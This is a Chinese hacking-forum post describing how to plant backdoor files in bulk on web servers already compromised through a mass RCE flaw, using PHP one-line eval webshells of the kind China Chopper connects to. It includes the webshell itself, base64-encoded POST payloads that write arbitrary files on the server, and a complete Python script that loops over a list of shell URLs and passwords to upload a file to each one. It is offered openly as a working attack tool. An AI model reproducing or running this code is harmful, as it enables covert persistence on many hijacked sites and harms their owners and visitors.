黑帽联盟

标题: PHP实现批量上传单个文件 [打印本页]

作者: yun    时间: 2017-3-14 21:42
标题: PHP实现批量上传单个文件
很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的web后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文给大家介绍基于php如何实现这类需求。

原理分析
首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。
下面是最常见的php一句话木马:
  1. <?php eval($_POST[1]); ?>
复制代码

当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。
那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的管理和控制呢?通过分析菜刀的原理,我们不难发现菜刀是利用了eval这个函数来执行通过POST方法传过来的命令语句。
因此,如果我们想通过菜刀一句话木马来实现文件上传的话,只需要向远程服务里上包含一句话的url发送一个带文件写入命令的POST请求即可,比如:

POST:
  1. 1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
复制代码

上面代码包含2个部分:
1. 一句话的密码
2. 发送给服务器端的php执行代码
既然知道原理了,我们只需要发送如下的POST请求即可完成利用一句话上传文件的功能:
POST:
1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9JF9QT1NUWyJ6MSJdOwokYz0kX1BPU1RbInoyIl07CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7&z1=L3Zhci93d3cvcm9vdC8xLnR4dA==&z2=aGVsbG8gd29ybGQh

仔细分析一下这段POST数据包含以下几个部分:
1. 首先是php一句话的密码1
2. 通过eval方法来执行base64解码后的z0,解码整理后显示如下:


3. 在z0中继续调用base64解码后的z1和z2,解码后如下:
z1=/var/www/root/1.txt
z2=hello world!

至此,我们可以很清楚的发现上面的POST请求的作用实际上是将一个写有hello world!的名为1.txt的文件上传至服务器上/var/www/root/路径下。
代码实现
基于上面的原理分析,我们可以利用下面的代码基于php一句话来实现文件批量上传:
  1. #!/usr/bin/python
  2. #coding=utf-8
  3. import urllib
  4. import urllib2
  5. import sys
  6. import base64
  7. import re
  8. def post(url, data):
  9.   req = urllib2.Request(url)
  10.   data = urllib.urlencode(data)  
  11.   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
  12.   response = opener.open(req, data)
  13.   return response.read()
  14. def get_shell_path(posturl,passwd):
  15.   shell_path = ""
  16.   try:
  17.     data = {}
  18.     data[passwd] = '@eval(base64_decode($_POST[z0]));'
  19.     data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
  20.     shell_path = post(posturl, data).strip()
  21.   except Exception:
  22.     pass
  23.   return shell_path
  24. def main():
  25.   print '\n+++++++++Batch Uploading Local File (Only for PHP web)++++++++++\n'
  26.   shellfile = sys.argv[1] # 存放web路径和密码的文件
  27.   localfile = sys.argv[2] # 本地待上传的文件名
  28.   shell_file = open(shellfile,'rb')
  29.   local_content = str(open(localfile,'rb').read())
  30.   for eachline in shell_file:
  31.     posturl = eachline.split(',')[0].strip()
  32.     passwd = eachline.split(',')[1].strip()
  33.     try:
  34.       reg = ".*/([^/]*\.php?)"
  35.       match_shell_name = re.search(reg,eachline)
  36.       if match_shell_name:
  37.         shell_name=match_shell_name.group(1)
  38.         shell_path = get_shell_path(posturl,passwd).strip()
  39.         target_path = shell_path.split(shell_name)[0]+localfile
  40.         target_path_base64 = base64.b64encode(target_path)
  41.         target_file_url = eachline.split(shell_name)[0]+localfile
  42.         data = {}
  43.         data[passwd] = '@eval(base64_decode($_POST[z0]));'
  44.         data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7'
  45.         data['z1']=target_path_base64
  46.         data['z2']=base64.b64encode(local_content)
  47.         response = post(posturl, data)
  48.         if response:
  49.           print '[+] '+target_file_url+', upload succeed!'
  50.         else:
  51.           print '[-] '+target_file_url+', upload failed!'
  52.       else:
  53.         print '[-] '+posturl+', unsupported web!'
  54.     except Exception,e:
  55.       print '[-] '+posturl+', connection failed!'
  56.   shell_file.close()
  57. if __name__ == '__main__':
  58.   main()
复制代码

web.txt的格式: [一句话web文件路径],[web连接密码]如下:
http://www.example1.com/1.php, 1
http://www.example2.com/1.php, 1
http://www.example3.com/1.php, 1

保存上面脚本为batch_upload_file.py,执行命令python batch_upload_file.py web.txt 1.txt,效果显示如下:
1.png



作者: qiaoqingyi    时间: 2018-5-3 01:45
··········




欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) Powered by Discuz! X2.5